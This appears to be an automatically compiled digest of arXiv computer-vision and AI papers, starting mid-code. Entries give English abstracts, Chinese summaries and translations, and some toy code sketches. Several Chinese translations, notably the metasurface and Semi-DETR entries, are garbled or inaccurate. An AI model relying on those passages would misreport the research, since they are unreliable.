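decoder = lambda z: z                      # identity "decoder" just for the sketch
A = lambda x: x[..., ::2]                  # toy linear forward operator (subsampling)
y = torch.randn(1, 4, 32)                  # toy measurements
z = hard_data_consistency(torch.randn(1, 4, 64), decoder, A, y)
z = stochastic_resample(z, z_prior=torch.randn_like(z), sigma=0.5)
```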

Domain Generalisation with Bidirectional Encoder Representations from Vision Transformers

  • paper_url: http://arxiv.org/abs/2307.08117
  • repo_url: https://github.com/sw-packages/d23c4b6afa05094a23071333bd230aceceec08117355003f5c0ea958e60c9c98
  • paper_authors: Hamza Riaz, Alan F. Smeaton
  • for: 这篇论文旨在应用领域普遍化(Domain Generalization)技术,将知识从来源领域(Source Domain)转移到未见领域(Target Domain),以扩展深度学习模型的应用范围。
  • methods: 这篇论文使用了视觉对映器(Vision Transformer)进行领域普遍化,并评估了四种不同的视觉对映器架构(ViT、LeViT、DeiT、BEIT)在对于不同的资料分布进行测试。
  • results: 根据结果显示,使用了bidirectional encoder representation from image transformers(BEIT)架构,在三个benchmark(PACS、Home-Office、DomainNet)上实现了显著的验证和测试准确率改善,并且在对于未见领域的测试中具有较好的表现。
    Abstract Domain generalisation involves pooling knowledge from source domain(s) into a single model that can generalise to unseen target domain(s). Recent research in domain generalisation has faced challenges when using deep learning models as they interact with data distributions which differ from those they are trained on. Here we perform domain generalisation on out-of-distribution (OOD) vision benchmarks using vision transformers. Initially we examine four vision transformer architectures namely ViT, LeViT, DeiT, and BEIT on out-of-distribution data. As the bidirectional encoder representation from image transformers (BEIT) architecture performs best, we use it in further experiments on three benchmarks PACS, Home-Office and DomainNet. Our results show significant improvements in validation and test accuracy and our implementation significantly overcomes gaps between within-distribution and OOD data.
    摘要 领域泛化(domain generalisation)是将来自源领域的知识汇聚到一个能够泛化到未见目标领域的单一模型中。近期的领域泛化研究在使用深度学习模型时面临挑战,因为这些模型所接触的数据分布与训练时的分布不同。本文使用视觉 Transformer 在分布外(OOD)视觉基准上进行领域泛化。我们首先在分布外数据上考察了四种视觉 Transformer 架构:ViT、LeViT、DeiT 和 BEIT。由于 bidirectional encoder representation from image transformers(BEIT)架构表现最佳,我们在 PACS、Home-Office 和 DomainNet 三个基准上用它开展了进一步实验。结果显示验证与测试准确率均有显著提升,我们的实现显著缩小了分布内数据与 OOD 数据之间的差距。

Polarization Multi-Image Synthesis with Birefringent Metasurfaces

  • paper_url: http://arxiv.org/abs/2307.08106
  • repo_url: https://github.com/deanhazineh/multi-image-synthesis
  • paper_authors: Dean Hazineh, Soon Wei Daniel Lim, Qi Guo, Federico Capasso, Todd Zickler
  • for: 论文面向非相干光电滤波(incoherent opto-electronic filtering)任务,这是光学元表面在计算成像系统中的一项新应用;论文展示了一个新系统,利用双折射元表面与偏振马赛克光传感器,在单次曝光中捕获四个光学编码测量。
  • methods: 数字空间滤波操作被替换为跨四个偏振通道的逐像素求和(与空间滤波器尺寸无关);为寻找能实现一组用户指定空间滤波器的元表面,论文引入了一种带有新型正则项的梯度下降方法,该正则项鼓励高光效率和高信噪比。
  • results: 论文在仿真和制造的原型上展示了多个示例,其中包括一些空间滤波器随深度和波长呈规定变化的例子。
    Abstract Optical metasurfaces composed of precisely engineered nanostructures have gained significant attention for their ability to manipulate light and implement distinct functionalities based on the properties of the incident field. Computational imaging systems have started harnessing this capability to produce sets of coded measurements that benefit certain tasks when paired with digital post-processing. Inspired by these works, we introduce a new system that uses a birefringent metasurface with a polarizer-mosaicked photosensor to capture four optically-coded measurements in a single exposure. We apply this system to the task of incoherent opto-electronic filtering, where digital spatial-filtering operations are replaced by simpler, per-pixel sums across the four polarization channels, independent of the spatial filter size. In contrast to previous work on incoherent opto-electronic filtering that can realize only one spatial filter, our approach can realize a continuous family of filters from a single capture, with filters being selected from the family by adjusting the post-capture digital summation weights. To find a metasurface that can realize a set of user-specified spatial filters, we introduce a form of gradient descent with a novel regularizer that encourages light efficiency and a high signal-to-noise ratio. We demonstrate several examples in simulation and with fabricated prototypes, including some with spatial filters that have prescribed variations with respect to depth and wavelength. Visit the Project Page at https://deanhazineh.github.io/publications/Multi_Image_Synthesis/MIS_Home.html
    摘要 依据精心设计的奈米结构,光学元面 composites 已经吸引了广泛关注,因为它们可以 manipulate 光子并实现基于入射场的特性而具有不同的功能性。计算成像系统已经开始利用这种能力生成具有特定任务需求的编码测量集,并通过数字后处理来实现。我们基于这些工作,引入了一种新的系统,使用偏振元面和分割成多个极化通道的探测器来在单个曝光中捕捉四个光学编码测量。我们应用这种系统于不同激光的吸收过滤器任务中,取代了传统的数字空间滤波操作,并且可以实现连续的家族filters,从单个捕捉中选择filters。为找到实现用户指定的空间滤波的元面,我们引入了一种新的迭代 descent 算法,其中包含了光效率和信号噪声比的新正则化项。我们在 simulate 和实验中示出了许多示例,包括一些具有深度和波长的特定变化的空间滤波。更多信息请参考
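
To make the per-pixel summation idea concrete, the sketch below combines a simulated four-channel, polarization-coded capture with different post-capture digital weights; each weight vector selects a different member of the continuous family of spatial filters. The array shapes and weights are illustrative assumptions, not values from the paper.

```python
import numpy as np

def synthesize_filtered_image(capture, weights):
    """Combine the four polarization-coded measurements with per-pixel sums.

    capture: array of shape (4, H, W), one optically coded image per polarization channel.
    weights: length-4 vector of post-capture digital summation weights; changing the
             weights selects a different spatial filter from the continuous family.
    This is only an illustrative sketch of the per-pixel summation described in the
    abstract; real coded measurements come from the fabricated metasurface system.
    """
    capture = np.asarray(capture, dtype=np.float64)
    weights = np.asarray(weights, dtype=np.float64).reshape(4, 1, 1)
    return (weights * capture).sum(axis=0)

# Toy usage: two different "filters" synthesized from one simulated 4-channel capture.
capture = np.random.rand(4, 64, 64)
img_a = synthesize_filtered_image(capture, [0.5, 0.5, -0.5, -0.5])
img_b = synthesize_filtered_image(capture, [1.0, -1.0, 0.0, 0.0])
```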

FourierHandFlow: Neural 4D Hand Representation Using Fourier Query Flow

  • paper_url: http://arxiv.org/abs/2307.08100
  • repo_url: None
  • paper_authors: Jihyun Lee, Junbong Jang, Donghwan Kim, Minhyuk Sung, Tae-Kyun Kim
  • for: 本研究旨在学习RGB视频中的人手四维形态,以实现高效精准的人手重建和动作估计。
  • methods: 本方法使用 Fourier 级数表示 query flow,并将 3D 占据场与关节感知的 query flow 组合起来,以实现四维形状的精准重建。
  • results: 在实验中,本方法在基于视频的 4D 重建上取得 state-of-the-art 的结果,同时比现有的 3D/4D 隐式形状表示更具计算效率。此外,学习到的隐式形状对应关系还可用于运动的内插、外插以及纹理迁移。
    Abstract Recent 4D shape representations model continuous temporal evolution of implicit shapes by (1) learning query flows without leveraging shape and articulation priors or (2) decoding shape occupancies separately for each time value. Thus, they do not effectively capture implicit correspondences between articulated shapes or regularize jittery temporal deformations. In this work, we present FourierHandFlow, which is a spatio-temporally continuous representation for human hands that combines a 3D occupancy field with articulation-aware query flows represented as Fourier series. Given an input RGB sequence, we aim to learn a fixed number of Fourier coefficients for each query flow to guarantee smooth and continuous temporal shape dynamics. To effectively model spatio-temporal deformations of articulated hands, we compose our 4D representation based on two types of Fourier query flow: (1) pose flow that models query dynamics influenced by hand articulation changes via implicit linear blend skinning and (2) shape flow that models query-wise displacement flow. In the experiments, our method achieves state-of-the-art results on video-based 4D reconstruction while being computationally more efficient than the existing 3D/4D implicit shape representations. We additionally show our results on motion inter- and extrapolation and texture transfer using the learned correspondences of implicit shapes. To the best of our knowledge, FourierHandFlow is the first neural 4D continuous hand representation learned from RGB videos. The code will be publicly accessible.
    摘要 最近的4D形态表示模型连续时间演化的隐式形态 by (1) 学习无关形态和肢体约束的查询流或 (2) 分解每个时间值的形态占用。因此,它们不能有效地捕捉隐式相关性 между 动体形态或正则化颤动幅。在这种工作中,我们提出了FourierHandFlow,它是一种包含3D占用场和形态相关的查询流 Fourier系列的四维表示。给输入的RGB序列,我们希望学习固定数量的Fourier系数来保证平滑和连续的时间形态动态。为了有效地模型动体形态的空间时间变换,我们将我们的4D表示分为两种类型的查询流:(1)pose流,它模型查询动态受到手肢变化的影响via隐式线性混合皮肤和(2)形态流,它模型查询点 wise的移动流。在实验中,我们的方法实现了视频基于4D重建的状态对齐的结果,而且与现有的3D/4D隐式形态表示更加计算效率。我们还展示了使用学习的隐式形态对应关系进行动作间隔和外部逼近,以及纹理传输。根据我们所知,FourierHandFlow是首次由RGB视频学习的神经网络4D连续手表示。代码将公开访问。
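
The sketch below shows, under simplifying assumptions, how a temporally continuous query flow can be evaluated from a fixed number of Fourier coefficients; in the paper those coefficients are predicted from the input RGB sequence and split into pose and shape flows, which this toy code does not model.

```python
import torch

def fourier_query_flow(coeffs_cos, coeffs_sin, t, period=1.0):
    """Evaluate a temporally continuous query flow parameterized as a truncated Fourier series.

    coeffs_cos, coeffs_sin: tensors of shape (K, N, 3) -- K Fourier terms for N query points in 3D.
    t: scalar time in [0, period). Returns per-query 3D displacements of shape (N, 3).
    Only a sketch of the 'fixed number of Fourier coefficients per query flow' idea.
    """
    K = coeffs_cos.shape[0]
    k = torch.arange(1, K + 1, dtype=coeffs_cos.dtype)          # harmonic indices 1..K
    phase = 2 * torch.pi * k * (t / period)                     # (K,)
    basis_cos = torch.cos(phase).view(K, 1, 1)
    basis_sin = torch.sin(phase).view(K, 1, 1)
    return (coeffs_cos * basis_cos + coeffs_sin * basis_sin).sum(dim=0)

# Smoothness comes for free: the flow is an analytic function of t.
flow_t = fourier_query_flow(torch.randn(4, 128, 3), torch.randn(4, 128, 3), t=0.3)
```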

CalibNet: Dual-branch Cross-modal Calibration for RGB-D Salient Instance Segmentation

  • paper_url: http://arxiv.org/abs/2307.08098
  • repo_url: https://github.com/pjlallen/calibnet
  • paper_authors: Jialun Pei, Tao Jiang, He Tang, Nian Liu, Yueming Jin, Deng-Ping Fan, Pheng-Ann Heng
  • for: 这个论文主要针对RGB-D图像中的精度实例分割问题,提出了一种基于双树 Cross-Modal Feature Calibration Architecture(CalibNet)的新方法。
  • methods: 该方法使用了三个简单模块:动态交互卷积(DIK)、重量共享 fusión(WSF)和深度相似度评估(DSA),这三个模块共同工作以生成有效的实例相关卷积和融合cross-modal特征。
  • results: 对于三个挑战性评价标准,该方法实现了出色的结果,即COME15K-N测试集上的AP为58.0%,比替代方案更高。
    Abstract We propose a novel approach for RGB-D salient instance segmentation using a dual-branch cross-modal feature calibration architecture called CalibNet. Our method simultaneously calibrates depth and RGB features in the kernel and mask branches to generate instance-aware kernels and mask features. CalibNet consists of three simple modules, a dynamic interactive kernel (DIK) and a weight-sharing fusion (WSF), which work together to generate effective instance-aware kernels and integrate cross-modal features. To improve the quality of depth features, we incorporate a depth similarity assessment (DSA) module prior to DIK and WSF. In addition, we further contribute a new DSIS dataset, which contains 1,940 images with elaborate instance-level annotations. Extensive experiments on three challenging benchmarks show that CalibNet yields a promising result, i.e., 58.0% AP with 320*480 input size on the COME15K-N test set, which significantly surpasses the alternative frameworks. Our code and dataset are available at: https://github.com/PJLallen/CalibNet.
    摘要 我们提出了一种新的RGB-D突出实例分割方法,基于双极分支交叉模式特征均衡架构,即CalibNet。我们的方法同时均衡了深度和RGB特征在核心和面罩分支中,以生成实例相关的核心和面罩特征。CalibNet由三个简单模块组成:动态互动核心(DIK)、重量共享融合(WSF)以及深度相似评估(DSA)模块。这些模块共同工作,以生成有效的实例相关核心和融合交叉特征。此外,我们还提供了一个新的DSIS数据集,包含1940张图像,每张图像均有详细的实例级别注解。我们的实验表明,CalibNet在三个挑战性的benchmark上实现了优秀的结果,即COME15K-N测试集上的58.0% AP值,与其他框架相比有显著提高。我们的代码和数据集可以在:https://github.com/PJLallen/CalibNet上获取。
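
As a hedged illustration of the weight-sharing fusion idea, the toy module below applies one shared convolution to both RGB and depth feature maps and merges them with a learned per-pixel gate; channel sizes are assumptions, and CalibNet's actual DIK/WSF/DSA modules are defined in the paper and repository.

```python
import torch
import torch.nn as nn

class WeightSharingFusion(nn.Module):
    """Sketch of weight-sharing fusion: the same projection embeds RGB and depth
    features before they are merged with a per-pixel modality gate."""
    def __init__(self, channels=64):
        super().__init__()
        self.shared = nn.Conv2d(channels, channels, kernel_size=3, padding=1)
        self.gate = nn.Sequential(nn.Conv2d(2 * channels, channels, 1), nn.Sigmoid())

    def forward(self, rgb_feat, depth_feat):
        r, d = self.shared(rgb_feat), self.shared(depth_feat)   # shared weights across modalities
        g = self.gate(torch.cat([r, d], dim=1))                 # per-pixel gate in [0, 1]
        return g * r + (1 - g) * d

fused = WeightSharingFusion()(torch.randn(1, 64, 32, 32), torch.randn(1, 64, 32, 32))
```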

Semi-DETR: Semi-Supervised Object Detection with Detection Transformers

  • paper_url: http://arxiv.org/abs/2307.08095
  • repo_url: https://github.com/PaddlePaddle/PaddleDetection/tree/develop/configs/semi_det/semi_detr
  • paper_authors: Jiacheng Zhang, Xiangru Lin, Wei Zhang, Kuo Wang, Xiao Tan, Junyu Han, Errui Ding, Jingdong Wang, Guanbin Li
  • for: 半监督物体检测(semi-supervised object detection,SSOD)
  • methods: 基于 DETR 的框架,采用 Stage-wise Hybrid Matching 策略与 Crossview Query Consistency 方法
  • results: 在 COCO 和 Pascal VOC 基准数据集的所有 SSOD 设定下,均以明显优势超越所有现有的 state-of-the-art 方法
    Abstract We analyze the DETR-based framework on semi-supervised object detection (SSOD) and observe that (1) the one-to-one assignment strategy generates incorrect matching when the pseudo ground-truth bounding box is inaccurate, leading to training inefficiency; (2) DETR-based detectors lack deterministic correspondence between the input query and its prediction output, which hinders the applicability of the consistency-based regularization widely used in current SSOD methods. We present Semi-DETR, the first transformer-based end-to-end semi-supervised object detector, to tackle these problems. Specifically, we propose a Stage-wise Hybrid Matching strategy that combines the one-to-many assignment and one-to-one assignment strategies to improve the training efficiency of the first stage and thus provide high-quality pseudo labels for the training of the second stage. Besides, we introduce a Crossview Query Consistency method to learn the semantic feature invariance of object queries from different views while avoiding the need to find deterministic query correspondence. Furthermore, we propose a Cost-based Pseudo Label Mining module to dynamically mine more pseudo boxes based on the matching cost of pseudo ground truth bounding boxes for consistency training. Extensive experiments on all SSOD settings of both COCO and Pascal VOC benchmark datasets show that our Semi-DETR method outperforms all state-of-the-art methods by clear margins. The PaddlePaddle version code1 is at https://github.com/PaddlePaddle/PaddleDetection/tree/develop/configs/semi_det/semi_detr.
    摘要 我们分析基于DETR的框架在半指导下的物体检测(SSOD)中,发现了两个问题:(1)一对一对应策略可能导致训练不精确,因为伪真的 bounding box 精度不高;(2)基于DETR的检测器缺乏对输入查询与其预测输出之间的决定性对匹配,这限制了现有的一般SSOD方法中的一致性基础训练的应用。我们提出了半DETR,第一个基于transformer的端到端半指导物体检测器,以解决这些问题。具体来说,我们提出了阶段匹配策略,让一个查询与多个预测结果之间进行匹配,从而提高了训练的效率,并且为第二阶段的训练提供高质量的伪标签。此外,我们引入了跨观查询内容一致性方法,以学习查询从不同观点的物体特征内在性,而不需要寻找决定性的查询匹配。最后,我们提出了一个基于成本的伪标签采矿模组,以动态地采矿更多的伪标签,以便实现一致性训练。实验结果显示,我们的半DETR方法在所有SSOD设定下,都比所有现有方法优化了明显。PaddlePaddle版本代码可以在以下链接中找到:https://github.com/PaddlePaddle/PaddleDetection/tree/develop/configs/semi_det/semi_detr。
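
The sketch below contrasts a one-to-one bipartite assignment with a top-k one-to-many assignment over a query-to-pseudo-box cost matrix, which is the gist of the stage-wise hybrid matching idea; the cost matrix here is random and the code is only a schematic of the strategy, not the Semi-DETR training pipeline.

```python
import numpy as np
from scipy.optimize import linear_sum_assignment

def one_to_one_assign(cost):
    """DETR-style bipartite matching: each pseudo ground-truth box gets exactly one query."""
    q_idx, g_idx = linear_sum_assignment(cost)
    return list(zip(q_idx, g_idx))

def one_to_many_assign(cost, k=4):
    """First-stage 'one-to-many' assignment: the k lowest-cost queries per pseudo box,
    which tolerates inaccurate pseudo ground truth and speeds up early training."""
    matches = []
    for g in range(cost.shape[1]):
        for q in np.argsort(cost[:, g])[:k]:
            matches.append((int(q), g))
    return matches

# Illustrative use of the stage-wise hybrid idea (not the authors' exact training code):
cost = np.random.rand(100, 5)           # matching cost between 100 queries and 5 pseudo boxes
stage1 = one_to_many_assign(cost, k=4)  # stage one: one-to-many for training efficiency
stage2 = one_to_one_assign(cost)        # stage two: one-to-one for high-quality pseudo labels
```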

Cross-Ray Neural Radiance Fields for Novel-view Synthesis from Unconstrained Image Collections

  • paper_url: http://arxiv.org/abs/2307.08093
  • repo_url: https://github.com/yifyang993/cr-nerf-pytorch
  • paper_authors: Yifan Yang, Shuhai Zhang, Zixiong Huang, Yubing Zhang, Mingkui Tan
  • for: 用于Synthesizing occlusion-free novel views from unconstrained image collections, addressing challenges such as dynamic changes in appearance and transient objects.
  • methods: 使用Cross-Ray NeRF (CR-NeRF)方法,利用多个ray的交互信息来模型变化的外观,并通过图像特征covariance和图像外观的统计方式来recover外观。此外,还提出了适应物体排除和网格采样策略来避免 occlusion 问题。
  • results: 经过广泛的实验 validate CR-NeRF 的有效性,能够Synthesize high-quality novel views with the same appearances as the input images, even in the presence of dynamic changes and transient objects.
    Abstract Neural Radiance Fields (NeRF) is a revolutionary approach for rendering scenes by sampling a single ray per pixel and it has demonstrated impressive capabilities in novel-view synthesis from static scene images. However, in practice, we usually need to recover NeRF from unconstrained image collections, which poses two challenges: 1) the images often have dynamic changes in appearance because of different capturing time and camera settings; 2) the images may contain transient objects such as humans and cars, leading to occlusion and ghosting artifacts. Conventional approaches seek to address these challenges by locally utilizing a single ray to synthesize a color of a pixel. In contrast, humans typically perceive appearance and objects by globally utilizing information across multiple pixels. To mimic the perception process of humans, in this paper, we propose Cross-Ray NeRF (CR-NeRF) that leverages interactive information across multiple rays to synthesize occlusion-free novel views with the same appearances as the images. Specifically, to model varying appearances, we first propose to represent multiple rays with a novel cross-ray feature and then recover the appearance by fusing global statistics, i.e., feature covariance of the rays and the image appearance. Moreover, to avoid occlusion introduced by transient objects, we propose a transient objects handler and introduce a grid sampling strategy for masking out the transient objects. We theoretically find that leveraging correlation across multiple rays promotes capturing more global information. Moreover, extensive experimental results on large real-world datasets verify the effectiveness of CR-NeRF.
    摘要 Neural Radiance Fields(NeRF)是一种革命性的方法,通过每个像素只采样一条光线来渲染场景,并在基于静态场景图像的新视角合成中展现出优异的能力。然而,在实际应用中,我们通常需要从无约束的图像集合中恢复 NeRF,这带来两个挑战:1)由于拍摄时间和相机设置不同,图像的外观经常发生动态变化;2)图像可能包含人和车辆等瞬态物体,导致遮挡和鬼影伪影。传统方法通过局部地使用单条光线来合成一个像素的颜色以应对这些挑战;而人类在感知外观和物体时,通常会全局地利用多个像素之间的信息。为了模仿人类的感知过程,我们在本文中提出了跨光线 NeRF(CR-NeRF),它利用多条光线之间的交互信息来合成无遮挡的新视角,同时保持与输入图像一致的外观。具体而言,为了建模变化的外观,我们首先提出用一种新的跨光线特征来表示多条光线,然后通过融合全局统计量(即光线特征的协方差)与图像外观来恢复外观。此外,为了避免瞬态物体引入的遮挡,我们提出了一个瞬态物体处理器,并引入网格采样策略来掩蔽瞬态物体。我们在理论上发现,利用多条光线之间的相关性有助于捕捉更多的全局信息。此外,我们在大规模真实数据集上进行了广泛的实验,验证了 CR-NeRF 的有效性。
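
Below is a minimal sketch of the "global statistics across rays" ingredient: gathering features from many rays of one image and computing their mean and covariance, which CR-NeRF fuses with the image appearance to model appearance changes. Shapes are illustrative and the fusion step itself is omitted.

```python
import torch

def cross_ray_appearance_stats(ray_feats):
    """Aggregate information across multiple rays via global statistics.

    ray_feats: (R, C) features for R rays of one image. Returns the mean feature and
    the feature covariance (the 'feature covariance of the rays' mentioned above)."""
    mean = ray_feats.mean(dim=0, keepdim=True)               # (1, C)
    centered = ray_feats - mean
    cov = centered.T @ centered / (ray_feats.shape[0] - 1)   # (C, C)
    return mean.squeeze(0), cov

feats = torch.randn(1024, 32)      # toy features sampled from 1024 rays of one image
mu, sigma = cross_ray_appearance_stats(feats)
```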

Gait Data Augmentation using Physics-Based Biomechanical Simulation

  • paper_url: http://arxiv.org/abs/2307.08092
  • repo_url: None
  • paper_authors: Mritula Chandrasekaran, Jarek Francik, Dimitrios Makris
  • for: 解决步态分析中数据稀缺的问题
  • methods: 使用基于物理的仿真器 OpenSIM 合成符合生物力学约束的步行序列,用于步态数据增强
  • results: 提高了基于模型的步态分类器的性能,并在 CASIA-B 数据集上实现了基于步态的人员识别的 state-of-the-art 结果,准确率高达 96.11%
    Abstract This paper focuses on addressing the problem of data scarcity for gait analysis. Standard augmentation methods may produce gait sequences that are not consistent with the biomechanical constraints of human walking. To address this issue, we propose a novel framework for gait data augmentation by using OpenSIM, a physics-based simulator, to synthesize biomechanically plausible walking sequences. The proposed approach is validated by augmenting the WBDS and CASIA-B datasets and then training gait-based classifiers for 3D gender gait classification and 2D gait person identification respectively. Experimental results indicate that our augmentation approach can improve the performance of model-based gait classifiers and deliver state-of-the-art results for gait-based person identification with an accuracy of up to 96.11% on the CASIA-B dataset.
    摘要 本文旨在解决步态分析中数据稀缺的问题。标准的数据增强方法可能生成不符合人体行走生物力学约束的步态序列。为解决这一问题,我们提出了一个新的步态数据增强框架,利用基于物理的仿真器 OpenSIM 合成生物力学上合理的步行序列。我们通过增强 WBDS 和 CASIA-B 数据集,并分别训练用于 3D 性别步态分类和 2D 步态人员识别的分类器来验证所提方法。实验结果表明,我们的增强方法能够提升基于模型的步态分类器的性能,并在 CASIA-B 数据集上以高达 96.11% 的准确率实现基于步态的人员识别的 state-of-the-art 结果。

Untrained neural network embedded Fourier phase retrieval from few measurements

  • paper_url: http://arxiv.org/abs/2307.08717
  • repo_url: https://github.com/liyuan-2000/trad
  • paper_authors: Liyuan Ma, Hongxia Wang, Ningyi Leng, Ziyang Yuan
  • for: 这篇论文旨在解决傅里叶相位恢复(Fourier phase retrieval,FPR)问题,即从无相位的傅里叶测量中重建未知信号。
  • methods: 该论文提出了一种基于交替方向乘子法(ADMM)框架、嵌入未训练神经网络(NN)的算法来解决 FPR 问题。该算法使用生成网络来表示待重建的图像,将图像约束在网络结构所定义的空间内;此外,还加入了总变分(TV)正则化,以便更好地恢复图像中的局部结构。
  • results: 实验结果表明,提出的算法在计算资源更少的情况下,能够超越现有的无学习NN基于算法,甚至与有学习NN基于算法相比表现竞争力强。
    Abstract Fourier phase retrieval (FPR) is a challenging task widely used in various applications. It involves recovering an unknown signal from its Fourier phaseless measurements. FPR with few measurements is important for reducing time and hardware costs, but it suffers from serious ill-posedness. Recently, untrained neural networks have offered new approaches by introducing learned priors to alleviate the ill-posedness without requiring any external data. However, they may not be ideal for reconstructing fine details in images and can be computationally expensive. This paper proposes an untrained neural network (NN) embedded algorithm based on the alternating direction method of multipliers (ADMM) framework to solve FPR with few measurements. Specifically, we use a generative network to represent the image to be recovered, which confines the image to the space defined by the network structure. To improve the ability to represent high-frequency information, total variation (TV) regularization is imposed to facilitate the recovery of local structures in the image. Furthermore, to reduce the computational cost mainly caused by the parameter updates of the untrained NN, we develop an accelerated algorithm that adaptively trades off between explicit and implicit regularization. Experimental results indicate that the proposed algorithm outperforms existing untrained NN-based algorithms with fewer computational resources and even performs competitively against trained NN-based algorithms.
    摘要 傅里叶相位恢复(FPR)是一项广泛应用的挑战性任务,其目标是从无相位的傅里叶测量中恢复未知信号。少量测量下的 FPR 对降低时间和硬件成本十分重要,但存在严重的病态性。最近,未训练神经网络(NN)通过引入学习到的先验来缓解病态性,且无需任何外部数据,提供了新的思路。然而,它们可能不适合重建图像中的细节,且计算代价较高。本文提出了一种基于交替方向乘子法(ADMM)框架、嵌入未训练 NN 的算法,用于解决少量测量下的 FPR 问题。具体而言,我们使用生成网络来表示待恢复的图像,将图像约束在网络结构所定义的空间内。为了提升对高频信息的表示能力,我们引入总变分(TV)正则化,以促进图像局部结构的恢复。此外,为了降低主要由未训练 NN 参数更新带来的计算代价,我们开发了一种在显式与隐式正则化之间自适应折衷的加速算法。实验结果表明,所提算法在使用更少计算资源的情况下优于现有的基于未训练 NN 的算法,甚至与基于已训练 NN 的算法相比也具有竞争力。
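
As a hedged sketch of the untrained-network prior, the code below fits a small random-weight CNN so that the Fourier magnitude of its output matches the measurements, with a total-variation penalty. Note this shows a plain joint-objective, gradient-descent variant for brevity, whereas the paper embeds the network in an ADMM framework with an accelerated, adaptive update.

```python
import torch
import torch.nn as nn

def tv_loss(x):
    """Anisotropic total-variation penalty encouraging piecewise-smooth local structure."""
    return ((x[..., 1:, :] - x[..., :-1, :]).abs().mean() +
            (x[..., :, 1:] - x[..., :, :-1]).abs().mean())

# Minimal sketch of an untrained-network prior for Fourier phase retrieval (not the paper's ADMM).
net = nn.Sequential(nn.Conv2d(1, 16, 3, padding=1), nn.ReLU(),
                    nn.Conv2d(16, 16, 3, padding=1), nn.ReLU(),
                    nn.Conv2d(16, 1, 3, padding=1), nn.Sigmoid())
z = torch.randn(1, 1, 64, 64)                 # fixed random input to the untrained network
magnitudes = torch.rand(1, 1, 64, 64)         # |F(x)| measurements (placeholder data)
opt = torch.optim.Adam(net.parameters(), lr=1e-3)
for _ in range(200):
    opt.zero_grad()
    x = net(z)                                # image confined to the network's range
    mag = torch.fft.fft2(x).abs()
    loss = ((mag - magnitudes) ** 2).mean() + 0.01 * tv_loss(x)
    loss.backward()
    opt.step()
```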

cs.AI - 2023-07-17

BuboGPT: Enabling Visual Grounding in Multi-Modal LLMs

  • paper_url: http://arxiv.org/abs/2307.08581
  • repo_url: https://github.com/magic-research/bubogpt
  • paper_authors: Yang Zhao, Zhijie Lin, Daquan Zhou, Zilong Huang, Jiashi Feng, Bingyi Kang
  • for: 这paper的目的是提出一种多模态LLM,可以在语言、视觉和声音三种模式之间进行交互,并提供细化的对象位置理解。
  • methods: 这paper使用了一种基于SAM的视觉定位模块,以及一种两阶段训练方案和指令数据集,来赋予模型联合的多模态理解能力。
  • results: 实验表明,BuboGPT在与人类交互时表现出了卓越的多模态理解和视觉定位能力,并在不同的模式组合(有Alignment和无Alignment)下表现consistently well。
    Abstract LLMs have demonstrated remarkable abilities at interacting with humans through language, especially with the usage of instruction-following data. Recent advancements in LLMs, such as MiniGPT-4, LLaVA, and X-LLM, further enlarge their abilities by incorporating multi-modal inputs, including image, video, and speech. Despite their effectiveness at generating precise and detailed language understanding of the given modality signal, these LLMs give up the ability to ground specific parts of inputs, thus only constructing a coarse-grained mapping. However, explicit and informative correspondence between text and other modalities will not only improve the user experience but also help to expand the application scenario of multi-modal LLMs. Therefore, we propose BuboGPT, a multi-modal LLM with visual grounding that can perform cross-modal interaction between vision, audio and language, providing fine-grained understanding of visual objects and other given modalities. As a result, BuboGPT is able to point out the specific location of an object in the image, when it is generating response or description for that object. Our contributions are two-fold: 1) An off-the-shelf visual grounding module based on SAM that extracts entities in a sentence and find corresponding masks in the image. 2) A two-stage training scheme and instruction dataset to endow joint text-image-audio understanding. Our experiments show that BuboGPT achieves impressive multi-modality understanding and visual grounding abilities during the interaction with human. It performs consistently well when provided by arbitrary modality combinations (either aligned or unaligned). Our code, model and dataset are available at https://bubo-gpt.github.io .
    摘要 LLMs 已经表现出了与人类语言交互的出色能力,特别是在使用指令数据时。最新的 LLMs,如 MiniGPT-4、LLaVA 和 X-LLM,通过纳入图像、视频和语音等多种输入模态,进一步扩展了它们的能力。尽管这些 LLMs 能够对给定模态信号生成精准而详细的语言理解,但它们放弃了对输入中特定部分进行定位(grounding)的能力,因此只能建立粗粒度的映射。然而,文本与其他模态之间显式且信息丰富的对应关系不仅会提高用户体验,还有助于扩展多模态 LLMs 的应用场景。因此,我们提出了 BuboGPT,一种具有视觉定位能力的多模态 LLM,可以在视觉、语音和语言之间进行跨模态交互,提供对视觉对象及其他给定模态的细粒度理解。因此,BuboGPT 能够在为某个对象生成响应或描述时,指出该对象在图像中的具体位置。我们的贡献有两方面:1. 一个基于 SAM 的现成视觉定位模块,可以从句子中提取实体并在图像中找到对应的掩码。2. 一种两阶段训练方案和指令数据集,用于赋予联合的文本-图像-音频理解能力。我们的实验表明,BuboGPT 在与人类交互时表现出了出色的多模态理解和视觉定位能力,并且在任意模态组合(无论对齐或不对齐)下都表现稳定。我们的代码、模型和数据集可在 https://bubo-gpt.github.io 获取。
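
The snippet below is only a schematic of the grounding step: entities extracted from the generated text are matched to candidate masks (e.g., proposals from SAM) by cosine similarity between text and visual embeddings. The embedding models, threshold, and interface are assumptions; BuboGPT's actual module is described in the paper and repository.

```python
import numpy as np

def ground_entities(entity_embs, mask_embs, threshold=0.25):
    """Match sentence entities to candidate image masks by embedding similarity.

    entity_embs: (E, D) text embeddings of entities mentioned in the generated response.
    mask_embs:   (M, D) visual embeddings of candidate masks (e.g. proposed by SAM).
    Returns, for each entity, the best-matching mask index or None if below threshold.
    """
    e = entity_embs / np.linalg.norm(entity_embs, axis=1, keepdims=True)
    m = mask_embs / np.linalg.norm(mask_embs, axis=1, keepdims=True)
    sims = e @ m.T                                   # (E, M) cosine similarities
    best = sims.argmax(axis=1)
    return [int(b) if sims[i, b] >= threshold else None for i, b in enumerate(best)]

# Toy usage with random placeholder embeddings:
matches = ground_entities(np.random.rand(3, 512), np.random.rand(10, 512))
```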

Nonlinear Processing with Linear Optics

  • paper_url: http://arxiv.org/abs/2307.08533
  • repo_url: None
  • paper_authors: Mustafa Yildirim, Niyazi Ulas Dinc, Ilker Oguz, Demetri Psaltis, Christophe Moser
  • for: 这项研究旨在提高神经网络的能效性和速度,通过利用光学实现多层神经网络,而不需要低功率光学非线性元件。
  • methods: 该研究提出了一种新的框架,通过多散射实现程序可编程的线性和非线性变换,并且可以在低光力率下实现非线性光学计算。
  • results: 理论和实验研究显示,通过重复数据的散射可以实现低功率连续波光学计算,并且可以同时实现线性和非线性变换。
